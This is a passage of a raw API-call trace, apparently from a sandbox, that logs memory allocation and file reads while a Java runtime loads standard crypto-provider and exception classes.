(_Block=0x12e60a00) [0119.775] malloc (_Size=0x48) returned 0x12e60190 [0119.775] malloc (_Size=0x2b) returned 0x12ef5410 [0119.776] free (_Block=0x12ef4e10) [0119.776] free (_Block=0x12e60910) [0119.776] malloc (_Size=0x48) returned 0x12e60370 [0119.777] malloc (_Size=0x51) returned 0x13061940 [0119.777] free (_Block=0x12ef5410) [0119.777] free (_Block=0x12e60190) [0119.778] malloc (_Size=0x48) returned 0x12e60af0 [0119.778] malloc (_Size=0x48) returned 0x12e60640 [0119.778] free (_Block=0x13061940) [0119.778] free (_Block=0x12e60370) [0119.779] malloc (_Size=0x48) returned 0x12e60a00 [0119.779] malloc (_Size=0x2a) returned 0x12ef5190 [0119.779] free (_Block=0x12e60640) [0119.779] free (_Block=0x12e60af0) [0119.783] malloc (_Size=0x48) returned 0x12e60320 [0119.783] malloc (_Size=0x34) returned 0x12ef48d0 [0119.783] free (_Block=0x12ef5190) [0119.784] free (_Block=0x12e60a00) [0119.784] malloc (_Size=0x48) returned 0x12e60690 [0119.784] malloc (_Size=0x30) returned 0x12ef4c50 [0119.785] free (_Block=0x12ef48d0) [0119.785] free (_Block=0x12e60320) [0119.786] malloc (_Size=0x48) returned 0x12e60a00 [0119.786] malloc (_Size=0x3d) returned 0x12e60640 [0119.786] free (_Block=0x12ef4c50) [0119.787] free (_Block=0x12e60690) [0119.787] malloc (_Size=0x48) returned 0x12e60190 [0119.787] malloc (_Size=0x46) returned 0x12e60550 [0119.788] free (_Block=0x12e60640) [0119.788] free (_Block=0x12e60a00) [0119.788] malloc (_Size=0x48) returned 0x12e60320 [0119.788] malloc (_Size=0x3d) returned 0x12e60370 [0119.789] free (_Block=0x12e60550) [0119.789] free (_Block=0x12e60190) [0119.790] malloc (_Size=0x48) returned 0x12e60550 [0119.790] malloc (_Size=0x3d) returned 0x12e60b90 [0119.790] free (_Block=0x12e60370) [0119.791] free (_Block=0x12e60320) [0119.792] malloc (_Size=0x48) returned 0x12e608c0 [0119.792] malloc (_Size=0x2c) returned 0x12ef4750 [0119.793] free (_Block=0x12e60b90) [0119.793] free (_Block=0x12e60550) [0119.794] malloc (_Size=0x48) returned 0x12e60190 [0119.794] malloc (_Size=0x3d) returned 0x12e60730 [0119.795] free (_Block=0x12ef4750) [0119.796] free (_Block=0x12e608c0) [0119.796] malloc (_Size=0x48) returned 0x12e60a00 [0119.796] malloc (_Size=0x3d) returned 0x12e60550 [0119.797] free (_Block=0x12e60730) [0119.797] free (_Block=0x12e60190) [0119.797] malloc (_Size=0x48) returned 0x12e60320 [0119.797] malloc (_Size=0x41) returned 0x12e603c0 [0119.798] free (_Block=0x12e60550) [0119.799] free (_Block=0x12e60a00) [0119.799] malloc (_Size=0x48) returned 0x12e60460 [0119.799] malloc (_Size=0x3d) returned 0x12e60550 [0119.800] free (_Block=0x12e603c0) [0119.800] free (_Block=0x12e60320) [0119.800] malloc (_Size=0x48) returned 0x12e60190 [0119.800] malloc (_Size=0x47) returned 0x12e60320 [0119.806] free (_Block=0x12e60550) [0119.807] free (_Block=0x12e60460) [0119.807] malloc (_Size=0x48) returned 0x12e60370 [0119.807] malloc (_Size=0x29) returned 0x12ef4810 [0119.808] free (_Block=0x12e60320) [0119.808] free (_Block=0x12e60190) [0119.808] malloc (_Size=0x48) returned 0x12e60730 [0119.808] malloc (_Size=0x29) returned 0x12ef4d10 [0119.809] free (_Block=0x12ef4810) [0119.809] free (_Block=0x12e60370) [0119.809] malloc (_Size=0x48) returned 0x12e60690 [0119.810] malloc (_Size=0x2c) returned 0x12ef5590 [0119.810] free (_Block=0x12ef4d10) [0119.810] free (_Block=0x12e60730) [0119.810] malloc (_Size=0x48) returned 0x12e60af0 [0119.810] malloc (_Size=0x38) returned 0x12ef4c50 [0119.812] free (_Block=0x12ef5590) [0119.812] free (_Block=0x12e60690) [0119.812] malloc (_Size=0x48) returned 0x12e60550 [0119.812] malloc (_Size=0x27) returned 0x12dda4d0 [0119.812] free (_Block=0x12ef4c50) [0119.813] free (_Block=0x12e60af0) [0119.813] malloc (_Size=0x48) returned 0x12e60aa0 [0119.813] malloc (_Size=0x48) returned 0x12e60af0 [0119.813] free (_Block=0x12dda4d0) [0119.813] free (_Block=0x12e60550) [0119.814] malloc (_Size=0x48) returned 0x12e60320 [0119.814] malloc (_Size=0x30) returned 0x12ef5410 [0119.814] free (_Block=0x12e60af0) [0119.814] free (_Block=0x12e60aa0) [0119.815] malloc (_Size=0x48) returned 0x12e60190 [0119.815] malloc (_Size=0x24) returned 0x12dd9fc0 [0119.815] free (_Block=0x12ef5410) [0119.815] free (_Block=0x12e60320) [0119.816] malloc (_Size=0x48) returned 0x12e60370 [0119.816] malloc (_Size=0x27) returned 0x12dda050 [0119.816] free (_Block=0x12dd9fc0) [0119.816] free (_Block=0x12e60190) [0119.817] malloc (_Size=0x48) returned 0x12e603c0 [0119.817] malloc (_Size=0x33) returned 0x12ef4fd0 [0119.817] free (_Block=0x12dda050) [0119.817] free (_Block=0x12e60370) [0119.817] malloc (_Size=0x48) returned 0x12e60870 [0119.818] malloc (_Size=0x41) returned 0x12e608c0 [0119.818] free (_Block=0x12ef4fd0) [0119.819] free (_Block=0x12e603c0) [0119.819] malloc (_Size=0x48) returned 0x12e60730 [0119.819] malloc (_Size=0x43) returned 0x12e60370 [0119.819] free (_Block=0x12e608c0) [0119.820] free (_Block=0x12e60870) [0119.820] malloc (_Size=0x48) returned 0x12e60870 [0119.820] malloc (_Size=0x34) returned 0x12ef5350 [0119.820] free (_Block=0x12e60370) [0119.821] free (_Block=0x12e60730) [0119.821] malloc (_Size=0x48) returned 0x12e60640 [0119.821] malloc (_Size=0x2e) returned 0x12ef5190 [0119.821] free (_Block=0x12ef5350) [0119.822] free (_Block=0x12e60870) [0119.822] malloc (_Size=0x48) returned 0x12e60320 [0119.822] malloc (_Size=0x31) returned 0x12ef4750 [0119.822] free (_Block=0x12ef5190) [0119.822] free (_Block=0x12e60640) [0119.823] malloc (_Size=0x48) returned 0x12e608c0 [0119.823] malloc (_Size=0x32) returned 0x12ef4b10 [0119.823] free (_Block=0x12ef4750) [0119.823] free (_Block=0x12e60320) [0119.824] malloc (_Size=0x48) returned 0x12e60aa0 [0119.824] malloc (_Size=0x2b) returned 0x12ef4dd0 [0119.824] free (_Block=0x12ef4b10) [0119.824] free (_Block=0x12e608c0) [0119.825] malloc (_Size=0x48) returned 0x12e60320 [0119.825] malloc (_Size=0x46) returned 0x12e60af0 [0119.825] free (_Block=0x12ef4dd0) [0119.825] free (_Block=0x12e60aa0) [0119.826] malloc (_Size=0x48) returned 0x12e60370 [0119.826] malloc (_Size=0x28) returned 0x12dda080 [0119.826] free (_Block=0x12e60af0) [0119.826] free (_Block=0x12e60320) [0119.827] malloc (_Size=0x48) returned 0x12e60550 [0119.827] malloc (_Size=0x27) returned 0x12dd9ba0 [0119.828] free (_Block=0x12dda080) [0119.828] free (_Block=0x12e60370) [0119.828] malloc (_Size=0x48) returned 0x12e60320 [0119.828] malloc (_Size=0x23) returned 0x12dd9ab0 [0119.829] free (_Block=0x12dd9ba0) [0119.829] free (_Block=0x12e60550) [0119.829] malloc (_Size=0x48) returned 0x12e60870 [0119.829] malloc (_Size=0x2c) returned 0x12ef5310 [0119.830] free (_Block=0x12dd9ab0) [0119.830] free (_Block=0x12e60320) [0119.830] malloc (_Size=0x48) returned 0x12e608c0 [0119.830] malloc (_Size=0x23) returned 0x12dda590 [0119.831] free (_Block=0x12ef5310) [0119.831] free (_Block=0x12e60870) [0119.831] malloc (_Size=0x48) returned 0x12e60320 [0119.831] malloc (_Size=0x48) returned 0x12e60550 [0119.831] free (_Block=0x12dda590) [0119.832] free (_Block=0x12e608c0) [0119.832] malloc (_Size=0x48) returned 0x12e60370 [0119.832] malloc (_Size=0x2b) returned 0x12ef4fd0 [0119.832] malloc (_Size=0x48) returned 0x12e60320 [0119.832] malloc (_Size=0x3d) returned 0x12e603c0 [0119.833] malloc (_Size=0x48) returned 0x12e60370 [0119.833] malloc (_Size=0x3a) returned 0x12e60b90 [0119.833] malloc (_Size=0x48) returned 0x12e60460 [0119.833] malloc (_Size=0x2b) returned 0x12ef5590 [0119.834] malloc (_Size=0x48) returned 0x12e60640 [0119.834] malloc (_Size=0x2c) returned 0x12ef5410 [0119.835] malloc (_Size=0x48) returned 0x12e60190 [0119.835] malloc (_Size=0x43) returned 0x12e60a00 [0119.835] malloc (_Size=0x48) returned 0x12e60910 [0119.835] malloc (_Size=0xb38) returned 0x12f4b8a0 [0119.835] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x43212, lpNewFilePointer=0x208f030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f030*=274962) returned 1 [0119.835] ReadFile (in: hFile=0x2d0, lpBuffer=0x12f4b8a0, nNumberOfBytesToRead=0xb38, lpNumberOfBytesRead=0x208f000, lpOverlapped=0x0 | out: lpBuffer=0x12f4b8a0*, lpNumberOfBytesRead=0x208f000*=0xb38, lpOverlapped=0x0) returned 1 [0119.836] free (_Block=0x12e21f70) [0119.836] malloc (_Size=0x3b) returned 0x12e60320 [0119.836] malloc (_Size=0x48) returned 0x12e60730 [0119.836] malloc (_Size=0x2b) returned 0x12ef5050 [0119.837] malloc (_Size=0x48) returned 0x12e60550 [0119.837] malloc (_Size=0x42) returned 0x12e60640 [0119.838] free (_Block=0x12ef5050) [0119.838] free (_Block=0x12e60730) [0119.838] malloc (_Size=0x48) returned 0x12e60190 [0119.838] malloc (_Size=0x2d) returned 0x12ef5150 [0119.839] free (_Block=0x12e60640) [0119.839] free (_Block=0x12e60550) [0119.842] malloc (_Size=0x48) returned 0x12e60460 [0119.842] malloc (_Size=0x2e) returned 0x12ef5610 [0119.842] free (_Block=0x12ef5150) [0119.843] free (_Block=0x12e60190) [0119.843] malloc (_Size=0x48) returned 0x12e60190 [0119.843] malloc (_Size=0x28) returned 0x12dda0e0 [0119.844] free (_Block=0x12ef5610) [0119.844] free (_Block=0x12e60460) [0119.844] malloc (_Size=0x48) returned 0x12e60a00 [0119.844] malloc (_Size=0x32) returned 0x12ef5150 [0119.845] free (_Block=0x12dda0e0) [0119.845] free (_Block=0x12e60190) [0119.849] malloc (_Size=0x48) returned 0x12e60690 [0119.849] malloc (_Size=0x2c) returned 0x12ef5310 [0119.850] free (_Block=0x12ef5150) [0119.850] free (_Block=0x12e60a00) [0119.851] malloc (_Size=0x48) returned 0x12e60730 [0119.851] malloc (_Size=0x47) returned 0x12e60870 [0119.851] free (_Block=0x12ef5310) [0119.851] free (_Block=0x12e60690) [0119.853] malloc (_Size=0x48) returned 0x12e60af0 [0119.853] malloc (_Size=0x3d) returned 0x12e60640 [0119.854] free (_Block=0x12e60870) [0119.854] free (_Block=0x12e60730) [0119.854] malloc (_Size=0x48) returned 0x12e60910 [0119.854] malloc (_Size=0x41) returned 0x12e60550 [0119.855] free (_Block=0x12e60640) [0119.855] free (_Block=0x12e60af0) [0119.855] malloc (_Size=0x48) returned 0x12e60320 [0119.855] malloc (_Size=0x39) returned 0x12e60640 [0119.856] free (_Block=0x12e60550) [0119.856] free (_Block=0x12e60910) [0119.856] malloc (_Size=0x48) returned 0x12e60190 [0119.856] malloc (_Size=0x42) returned 0x12e608c0 [0119.857] free (_Block=0x12e60640) [0119.857] free (_Block=0x12e60320) [0119.857] malloc (_Size=0x48) returned 0x12e60730 [0119.857] malloc (_Size=0x30) returned 0x12ef5050 [0119.857] free (_Block=0x12e608c0) [0119.858] free (_Block=0x12e60190) [0119.858] malloc (_Size=0x48) returned 0x12e60870 [0119.858] malloc (_Size=0x34) returned 0x12ef47d0 [0119.859] free (_Block=0x12ef5050) [0119.859] free (_Block=0x12e60730) [0119.859] malloc (_Size=0x48) returned 0x12e60640 [0119.859] malloc (_Size=0x43) returned 0x12e60190 [0119.859] free (_Block=0x12ef47d0) [0119.860] free (_Block=0x12e60870) [0119.860] malloc (_Size=0x48) returned 0x12e60320 [0119.860] malloc (_Size=0x2c) returned 0x12ef5410 [0119.860] free (_Block=0x12e60190) [0119.860] free (_Block=0x12e60640) [0119.861] malloc (_Size=0x48) returned 0x12e60190 [0119.861] malloc (_Size=0x3d) returned 0x12e60640 [0119.861] free (_Block=0x12ef5410) [0119.861] free (_Block=0x12e60320) [0119.862] malloc (_Size=0x48) returned 0x12e60320 [0119.862] malloc (_Size=0x43) returned 0x12e60370 [0119.862] free (_Block=0x12e60640) [0119.862] free (_Block=0x12e60190) [0119.863] malloc (_Size=0x48) returned 0x12e60b40 [0119.863] malloc (_Size=0x31) returned 0x12ef4c50 [0119.863] free (_Block=0x12e60370) [0119.863] free (_Block=0x12e60320) [0119.864] malloc (_Size=0x48) returned 0x12e60190 [0119.864] malloc (_Size=0x31) returned 0x12ef5590 [0119.864] free (_Block=0x12ef4c50) [0119.864] free (_Block=0x12e60b40) [0119.864] malloc (_Size=0x48) returned 0x12e60320 [0119.865] malloc (_Size=0x2f) returned 0x12ef5610 [0119.865] free (_Block=0x12ef5590) [0119.865] free (_Block=0x12e60190) [0119.865] malloc (_Size=0x48) returned 0x12e60640 [0119.865] malloc (_Size=0x2e) returned 0x12ef46d0 [0119.866] free (_Block=0x12ef5610) [0119.866] free (_Block=0x12e60320) [0119.866] malloc (_Size=0x48) returned 0x12e60690 [0119.866] malloc (_Size=0x41) returned 0x12e60370 [0119.867] free (_Block=0x12ef46d0) [0119.867] free (_Block=0x12e60640) [0119.867] malloc (_Size=0x48) returned 0x12e60320 [0119.867] malloc (_Size=0x3d) returned 0x12e60af0 [0119.868] free (_Block=0x12e60370) [0119.868] free (_Block=0x12e60690) [0119.868] malloc (_Size=0x48) returned 0x12e608c0 [0119.868] malloc (_Size=0x48) returned 0x12e60640 [0119.868] free (_Block=0x12e60af0) [0119.869] free (_Block=0x12e60320) [0119.869] malloc (_Size=0x48) returned 0x12e60910 [0119.869] malloc (_Size=0x2e) returned 0x12ef4790 [0119.869] free (_Block=0x12e60640) [0119.870] free (_Block=0x12e608c0) [0119.870] malloc (_Size=0x48) returned 0x12e60a00 [0119.871] malloc (_Size=0x2e) returned 0x12ef5610 [0119.871] free (_Block=0x12ef4790) [0119.871] free (_Block=0x12e60910) [0119.872] malloc (_Size=0x48) returned 0x12e60870 [0119.872] malloc (_Size=0xc) returned 0x12d45110 [0119.872] free (_Block=0x12ef5610) [0119.873] free (_Block=0x12e60a00) [0119.876] free (_Block=0x12ef5680) [0119.877] free (_Block=0x1230da20) [0119.877] free (_Block=0x12ee9080) [0119.884] strlen (_Str="com/sun/crypto/provider/AESCipher$General") returned 0x29 [0119.885] malloc (_Size=0x48) returned 0x12e60910 [0119.885] malloc (_Size=0xa0) returned 0x12daace0 [0119.885] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x43724, lpNewFilePointer=0x208dbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbd0*=276260) returned 1 [0119.885] ReadFile (in: hFile=0x2d0, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dba0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208dba0*=0xa0, lpOverlapped=0x0) returned 1 [0119.885] malloc (_Size=0x30) returned 0x12ef4cd0 [0119.886] free (_Block=0x12d45110) [0119.886] free (_Block=0x12e60870) [0119.890] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c1b3, lpNewFilePointer=0x208bdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdd0*=246195) returned 1 [0119.890] ReadFile (in: hFile=0x2d0, lpBuffer=0x208be20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bda0, lpOverlapped=0x0 | out: lpBuffer=0x208be20*, lpNumberOfBytesRead=0x208bda0*=0x1e, lpOverlapped=0x0) returned 1 [0119.890] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3c200, lpNewFilePointer=0x208be30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be30*=246272) returned 1 [0119.890] ReadFile (in: hFile=0x2d0, lpBuffer=0x208bf40, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x208be00, lpOverlapped=0x0 | out: lpBuffer=0x208bf40*, lpNumberOfBytesRead=0x208be00*=0xdb, lpOverlapped=0x0) returned 1 [0119.896] malloc (_Size=0x126) returned 0x1230dbe0 [0119.897] strlen (_Str="com/sun/crypto/provider/AESCipher") returned 0x21 [0119.898] malloc (_Size=0x48) returned 0x12e60640 [0119.898] malloc (_Size=0xa0) returned 0x12dac9c0 [0119.898] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x403c8, lpNewFilePointer=0x208b670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b670*=263112) returned 1 [0119.899] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b640, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208b640*=0xa0, lpOverlapped=0x0) returned 1 [0119.899] malloc (_Size=0x28) returned 0x12dda170 [0119.900] free (_Block=0x12ef4cd0) [0119.900] free (_Block=0x12e60910) [0119.902] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1492b, lpNewFilePointer=0x2089870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089870*=84267) returned 1 [0119.902] ReadFile (in: hFile=0x2d0, lpBuffer=0x20898c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089840, lpOverlapped=0x0 | out: lpBuffer=0x20898c0*, lpNumberOfBytesRead=0x2089840*=0x1e, lpOverlapped=0x0) returned 1 [0119.902] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14970, lpNewFilePointer=0x20898d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20898d0*=84336) returned 1 [0119.902] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899e0, nNumberOfBytesToRead=0x998, lpNumberOfBytesRead=0x20898a0, lpOverlapped=0x0 | out: lpBuffer=0x20899e0*, lpNumberOfBytesRead=0x20898a0*=0x998, lpOverlapped=0x0) returned 1 [0119.907] malloc (_Size=0x1741) returned 0x12f4d4d0 [0119.913] strlen (_Str="javax/crypto/CipherSpi") returned 0x16 [0119.914] strlen (_Str="javax/crypto/CipherSpi.class") returned 0x1c [0119.914] strlen (_Str="javax/crypto/CipherSpi.class") returned 0x1c [0119.914] malloc (_Size=0x48) returned 0x12e60b40 [0119.914] malloc (_Size=0xa0) returned 0x12daace0 [0119.914] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1aeb8, lpNewFilePointer=0x2089c40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089c40*=110264) returned 1 [0119.914] ReadFile (in: hFile=0x2c8, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089c10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x2089c10*=0xa0, lpOverlapped=0x0) returned 1 [0119.914] malloc (_Size=0x1d) returned 0x12dda590 [0119.915] strlen (_Str="javax/crypto/CipherSpi.class") returned 0x1c [0119.915] strcpy (in: _Dest=0x2089dc0, _Source="javax/crypto/CipherSpi.class" | out: _Dest="javax/crypto/CipherSpi.class") returned="javax/crypto/CipherSpi.class" [0119.915] malloc (_Size=0x1bf0) returned 0x12f4ec20 [0119.915] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x37e6, lpNewFilePointer=0x2088750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088750*=14310) returned 1 [0119.915] ReadFile (in: hFile=0x2c8, lpBuffer=0x20887a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088720, lpOverlapped=0x0 | out: lpBuffer=0x20887a0*, lpNumberOfBytesRead=0x2088720*=0x1e, lpOverlapped=0x0) returned 1 [0119.915] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x3820, lpNewFilePointer=0x20887b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20887b0*=14368) returned 1 [0119.915] ReadFile (in: hFile=0x2c8, lpBuffer=0x20888a0, nNumberOfBytesToRead=0x8d4, lpNumberOfBytesRead=0x2088780, lpOverlapped=0x0 | out: lpBuffer=0x20888a0*, lpNumberOfBytesRead=0x2088780*=0x8d4, lpOverlapped=0x0) returned 1 [0119.916] malloc (_Size=0x8000) returned 0x12ef5680 [0119.916] free (_Block=0x12ef4310) [0119.917] free (_Block=0x12ef2ca0) [0119.927] free (_Block=0x12f4d4d0) [0119.928] free (_Block=0x1230dbe0) [0119.932] strlen (_Str="com/sun/crypto/provider/SymmetricCipher") returned 0x27 [0119.934] malloc (_Size=0x48) returned 0x12e5ed90 [0119.934] malloc (_Size=0xa0) returned 0x12dab940 [0119.934] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x43ca0, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=277664) returned 1 [0119.934] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208b470*=0xa0, lpOverlapped=0x0) returned 1 [0119.934] malloc (_Size=0x2e) returned 0x12ef4490 [0119.935] free (_Block=0x12dda170) [0119.935] free (_Block=0x12e60640) [0119.937] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3efed, lpNewFilePointer=0x20896a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20896a0*=258029) returned 1 [0119.938] ReadFile (in: hFile=0x2d0, lpBuffer=0x20896f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089670, lpOverlapped=0x0 | out: lpBuffer=0x20896f0*, lpNumberOfBytesRead=0x2089670*=0x1e, lpOverlapped=0x0) returned 1 [0119.938] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f038, lpNewFilePointer=0x2089700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089700*=258104) returned 1 [0119.938] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089810, nNumberOfBytesToRead=0x133, lpNumberOfBytesRead=0x20896d0, lpOverlapped=0x0 | out: lpBuffer=0x2089810*, lpNumberOfBytesRead=0x20896d0*=0x133, lpOverlapped=0x0) returned 1 [0119.942] malloc (_Size=0x1a7) returned 0x1230e4e0 [0119.944] free (_Block=0x1230e4e0) [0119.945] strlen (_Str="com/sun/crypto/provider/AESCrypt") returned 0x20 [0119.946] malloc (_Size=0x48) returned 0x12e60640 [0119.946] malloc (_Size=0xa0) returned 0x12dac390 [0119.946] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x41ef5, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=270069) returned 1 [0119.946] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208b470*=0xa0, lpOverlapped=0x0) returned 1 [0119.947] malloc (_Size=0x27) returned 0x12dda5c0 [0119.947] free (_Block=0x12ef4490) [0119.947] free (_Block=0x12e5ed90) [0119.949] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25ea7, lpNewFilePointer=0x20896a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20896a0*=155303) returned 1 [0119.949] ReadFile (in: hFile=0x2d0, lpBuffer=0x20896f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089670, lpOverlapped=0x0 | out: lpBuffer=0x20896f0*, lpNumberOfBytesRead=0x2089670*=0x1e, lpOverlapped=0x0) returned 1 [0119.949] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25eeb, lpNewFilePointer=0x2089700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089700*=155371) returned 1 [0119.949] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089810, nNumberOfBytesToRead=0x1217, lpNumberOfBytesRead=0x20896d0, lpOverlapped=0x0 | out: lpBuffer=0x2089810*, lpNumberOfBytesRead=0x20896d0*=0x1217, lpOverlapped=0x0) returned 1 [0119.952] malloc (_Size=0x2f8d) returned 0x12f4d4d0 [0119.953] strlen (_Str="com/sun/crypto/provider/AESConstants") returned 0x24 [0119.954] malloc (_Size=0x48) returned 0x12e60000 [0119.954] malloc (_Size=0xa0) returned 0x12dab890 [0119.954] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f8fb, lpNewFilePointer=0x2088ec0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088ec0*=260347) returned 1 [0119.955] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2088e90, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x2088e90*=0xa0, lpOverlapped=0x0) returned 1 [0119.955] malloc (_Size=0x2b) returned 0x12ef5050 [0119.955] free (_Block=0x12dda5c0) [0119.956] free (_Block=0x12e60640) [0119.957] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8b78, lpNewFilePointer=0x20870c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20870c0*=35704) returned 1 [0119.957] ReadFile (in: hFile=0x2d0, lpBuffer=0x2087110, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2087090, lpOverlapped=0x0 | out: lpBuffer=0x2087110*, lpNumberOfBytesRead=0x2087090*=0x1e, lpOverlapped=0x0) returned 1 [0119.957] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8bc0, lpNewFilePointer=0x2087120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2087120*=35776) returned 1 [0119.957] ReadFile (in: hFile=0x2d0, lpBuffer=0x2087230, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x20870f0, lpOverlapped=0x0 | out: lpBuffer=0x2087230*, lpNumberOfBytesRead=0x20870f0*=0x109, lpOverlapped=0x0) returned 1 [0119.958] malloc (_Size=0x147) returned 0x1230e4e0 [0119.960] free (_Block=0x1230e4e0) [0119.967] free (_Block=0x12f4d4d0) [0119.970] strlen (_Str="java/lang/IllegalStateException") returned 0x1f [0119.970] strlen (_Str="java/lang/IllegalStateException.class") returned 0x25 [0119.970] malloc (_Size=0x48) returned 0x12e60640 [0119.970] malloc (_Size=0xa0) returned 0x12dac9c0 [0119.970] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34125ce, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=54601166) returned 1 [0119.970] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c990*=0xa0, lpOverlapped=0x0) returned 1 [0119.972] malloc (_Size=0x26) returned 0x12dda3b0 [0119.973] strlen (_Str="java/lang/IllegalStateException.class") returned 0x25 [0119.973] strcpy (in: _Dest=0x208cb40, _Source="java/lang/IllegalStateException.class" | out: _Dest="java/lang/IllegalStateException.class") returned="java/lang/IllegalStateException.class" [0119.973] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc3e60, lpNewFilePointer=0x208c5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5c0*=50085472) returned 1 [0119.973] ReadFile (in: hFile=0x134, lpBuffer=0x208c610, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c590, lpOverlapped=0x0 | out: lpBuffer=0x208c610*, lpNumberOfBytesRead=0x208c590*=0x1e, lpOverlapped=0x0) returned 1 [0120.144] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc3ea3, lpNewFilePointer=0x208c620, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c620*=50085539) returned 1 [0120.144] ReadFile (in: hFile=0x134, lpBuffer=0x12d54f40, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x208c5f0, lpOverlapped=0x0 | out: lpBuffer=0x12d54f40*, lpNumberOfBytesRead=0x208c5f0*=0x1bb, lpOverlapped=0x0) returned 1 [0120.303] free (_Block=0x12ef50d0) [0120.303] free (_Block=0x12e602d0) [0120.315] strlen (_Str="com/sun/crypto/provider/CipherCore") returned 0x22 [0120.316] malloc (_Size=0x48) returned 0x12e602d0 [0120.316] malloc (_Size=0xa0) returned 0x12daaef0 [0120.316] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x426fa, lpNewFilePointer=0x208c510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c510*=272122) returned 1 [0120.316] ReadFile (in: hFile=0x2d0, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4e0, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c4e0*=0xa0, lpOverlapped=0x0) returned 1 [0120.316] malloc (_Size=0x29) returned 0x12ef50d0 [0120.317] free (_Block=0x12ef5050) [0120.318] free (_Block=0x12e60000) [0120.321] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2aa96, lpNewFilePointer=0x208a710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a710*=174742) returned 1 [0120.321] ReadFile (in: hFile=0x2d0, lpBuffer=0x208a760, nNumberOfBytesToRead=0x1e, 